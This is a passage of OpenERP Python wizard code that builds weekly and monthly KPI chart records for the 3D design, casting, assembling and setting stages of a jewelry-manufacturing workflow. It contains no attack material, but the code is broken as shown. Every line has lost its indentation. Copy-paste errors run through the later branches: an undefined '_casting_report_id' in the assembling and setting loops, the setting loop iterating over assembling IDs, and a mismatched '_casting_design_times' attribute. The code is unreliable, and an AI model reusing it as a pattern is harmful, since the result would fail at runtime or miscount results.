self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type': str(times), 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
if _3d_report.product_id._3d_design_times:
times = _3d_report.product_id._3d_design_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
self.pool.get('hp.kpis.view.chart.3d.productivity').create(cr, uid, {'name': month.name, 'type': str(times), 'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_productivity_graph')
elif obj.type_report == 'compare':
_3d_ids = self.pool.get('hp.kpis.view.chart.3d.compare').search(cr, uid, [])
if(_3d_ids):
self.pool.get('hp.kpis.view.chart.3d.compare').unlink(cr, uid, _3d_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
self.pool.get('hp.kpis.view.chart.3d.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_3d_report.parent_id.designer_id.id,'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_3d_report_ids = self.pool.get('hpusa.3d.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _3d_report_id in _3d_report_ids:
_3d_report = self.pool.get('hpusa.3d.report.line').browse(cr, uid, _3d_report_id)
self.pool.get('hp.kpis.view.chart.3d.compare').create(cr, uid, {'name': month.name,'employee_id':_3d_report.parent_id.designer_id.id,'point': _3d_report.point, 'quantity': 1 * _3d_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_3d_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_3d()
class wizard_hp_report_chart_kpis_casting(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.casting"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
#open action
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if obj.type_report == 'synthetic':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting').unlink(cr, uid, _casting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if(i == 1):
date_from = date_to
else:
date_from = date_to + relativedelta(days=1)
date_to = date_from + relativedelta(days=6)
print date_from, date_to
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _casting_report_id in _casting_report_ids:
line = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
point += line.point
qty += line.complete
self.pool.get('hp.kpis.view.chart.casting').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _casting_report_id in _casting_report_ids:
line = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
point += line.point
qty += line.complete
self.pool.get('hp.kpis.view.chart.casting').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting.productivity').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting.productivity').unlink(cr, uid, _casting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#khoi tao cot cho moi tuan
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
if _casting_report.product_id.casting_times:
times = _casting_report.product_id.casting_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type': str(times), 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
if _casting_report.product_id._casting_design_times:
times = _casting_report.product_id._casting_design_times.name
if times > 3:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
self.pool.get('hp.kpis.view.chart.casting.productivity').create(cr, uid, {'name': month.name, 'type': str(times), 'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_productivity_graph')
elif obj.type_report == 'compare':
_casting_ids = self.pool.get('hp.kpis.view.chart.casting.compare').search(cr, uid, [])
if(_casting_ids):
self.pool.get('hp.kpis.view.chart.casting.compare').unlink(cr, uid, _casting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
self.pool.get('hp.kpis.view.chart.casting.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_casting_report.worker.id,'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_casting_report_ids = self.pool.get('hpusa.casting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _casting_report_id in _casting_report_ids:
_casting_report = self.pool.get('hpusa.casting.report.line').browse(cr, uid, _casting_report_id)
self.pool.get('hp.kpis.view.chart.casting.compare').create(cr, uid, {'name': month.name,'employee_id':_casting_report.worker.id,'point': _casting_report.point, 'quantity': 1 * _casting_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_casting_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_casting()
class wizard_hp_report_chart_kpis_assembling(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.assembling"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if(obj.type_report == 'synthetic'):
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling').unlink(cr, uid, _assembling_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _assembling_report_id in _assembling_report_ids:
line = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.assembling').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _assembling_report_id in _assembling_report_ids:
line = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.assembling').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling.productivity').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling.productivity').unlink(cr, uid, _assembling_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#khoi tao cot cho moi tuan
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': 0, 'quantity': 0})
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
if _assembling_report.product_id.ass_difficulty_level:
level = _assembling_report.product_id.ass_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': 0, 'quantity': 0})
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _casting_report_id)
if _assembling_report.product_id.ass_difficulty_level:
level = _assembling_report.product_id.ass_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.assembling.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_productivity_graph')
elif obj.type_report == 'compare':
_assembling_ids = self.pool.get('hp.kpis.view.chart.assembling.compare').search(cr, uid, [])
if(_assembling_ids):
self.pool.get('hp.kpis.view.chart.assembling.compare').unlink(cr, uid, _assembling_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
self.pool.get('hp.kpis.view.chart.assembling.compare').create(cr, uid, {'name': 'Week '+str(i),'employee_id':_assembling_report.worker.id,'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_assembling_report_ids = self.pool.get('hpusa.assembling.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _assembling_report_id in _assembling_report_ids:
_assembling_report = self.pool.get('hpusa.assembling.report.line').browse(cr, uid, _assembling_report_id)
self.pool.get('hp.kpis.view.chart.assembling.compare').create(cr, uid, {'name': month.name,'employee_id':_assembling_report.worker.id,'point': _assembling_report.point, 'quantity': 1 * _assembling_report.complete})
#open action
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_assembling_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_assembling()
class wizard_hp_report_chart_kpis_setting(osv.osv_memory):
_name = "wizard.hp.report.chart.kpis.setting"
_table = "wizard_hp_report_chart_kpis"
_inherit = "wizard.hp.report.chart.kpis"
def action_view_chart(self, cr, uid, ids, context):
obj = self.browse(cr, uid, ids[0], context)
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
if(obj.type_report == 'synthetic'):
_setting_ids = self.pool.get('hp.kpis.view.chart.setting').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting').unlink(cr, uid, _setting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _setting_report_id in _setting_report_ids:
line = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.setting').create(cr, uid, {'name': 'Week '+str(i),'point': point, 'quantity': qty})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
point = 0
qty = 0
for _setting_report_id in _setting_report_ids:
line = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
point += line.point
qty += 1 * line.complete
self.pool.get('hp.kpis.view.chart.setting').create(cr, uid, {'name': month.name,'point': point, 'quantity': qty})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_graph')
elif obj.type_report == 'productivity' or obj.type_report == 'productivity_worker':
_setting_ids = self.pool.get('hp.kpis.view.chart.setting.productivity').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting.productivity').unlink(cr, uid, _setting_ids)
if obj.option == 'month':
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#khoi tao cot cho moi tuan
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': 0, 'quantity': 0})
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
if(not obj.employee_id):
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
else:
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('worker','=',obj.employee_id.id),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
_setting_report = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
if _setting_report.product_id.setting_difficulty_level:
level = _setting_report.product_id.setting_difficulty_level.name
if level == 'I':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'1', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'2', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'3', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'4', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'5', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': 'Week '+str(i), 'type':'6', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
else:
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': 0, 'quantity': 0})
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': 0, 'quantity': 0})
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _setting_report_id in _assembling_report_ids:
_setting_report = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _casting_report_id)
if _setting_report.product_id.setting_difficulty_level:
level = _setting_report.product_id.setting_difficulty_level.name
if level == 'I':
